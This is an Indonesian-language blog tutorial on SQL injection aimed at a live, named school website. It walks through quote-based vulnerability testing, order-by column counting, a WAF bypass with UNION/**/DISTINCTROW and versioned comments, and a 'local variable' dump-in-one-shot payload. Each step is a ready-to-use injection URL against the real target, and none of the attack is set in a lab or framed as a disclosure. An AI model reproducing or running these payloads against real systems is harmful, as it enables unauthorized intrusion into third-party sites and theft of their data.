BLANTERWISDOM101

Learning Sqli Methode Localvariabel

Kamis, 17 Desember 2020

yo wasap gan , Bertemu Dengan Saya Andi Ivan , kali ini saya akan membuat tutorial how to learning sqli methode localvaribel

Oke langsung aja kita ke tutorial nya

Live Target :
https://www.dpsdhuri.edu.in/catwise_events.php?parent=1&&id=4

Kita beri tanda (')

Menjadi=
https://www.dpsdhuri.edu.in/catwise_events.php?parent=1&&id=4'
Tanda (') untuk mengecek vuln nya web tsb

Mari langsung kita coba order by
https://www.dpsdhuri.edu.in/catwise_events.php?parent=1&&id=4'+order+by+1--+-

Disini akses kita untuk masuk kembali ke web tsb dilarang.


Kita ubah order by nya menjadi
https://www.dpsdhuri.edu.in/catwise_events.php?parent=1&&id=4+order+by+1+asc--+-
Dan kembali seperti semula,lanjut kita cari colom error nya

And colom tsb hanya 3

https://www.dpsdhuri.edu.in/catwise_events.php?parent=1&&id=4+order+by+1+asc

order+by+2+asc--+-

order+by+3+asc--+-

Menjadi https://www.dpsdhuri.edu.in/catwise_events.php?parent=1&&id=4+union+select+1,2,3--+-
Dan kita mengalami forbidden 403

Cara mengatasi nya kita menggunakan bypass waff union select


kita bypass waff menjadi

https://www.dpsdhuri.edu.in/catwise_events.php?parent=1&&id=4+AND+0+UNION/**/DISTINCTROW+SELECT+111111,2,3--+-

Langsung kita coba tempel Dios kita di angka ajaib yang tertera

Mari kita coba menggunakan methode localvaribel

Kita localvaribel menjadi seperti yang dibawah ini dan angka ajaib(2) tersebut kita ubah menjadi @ivan sebagai contoh. bisa kalian ganti dengan yang kalian suka

https://www.dpsdhuri.edu.in/catwise_events.php?parent=1&&id=4 and mod(9,9) div@ivan:=untukdios /*!50000union*/ /*!50000select*/ 1,@ivan,3%23


And Done.

Cukup Sekian Materi Dari Saya 

Sampai Jumpa Materi Selanjutnya ^-^


Share This :

0 komentar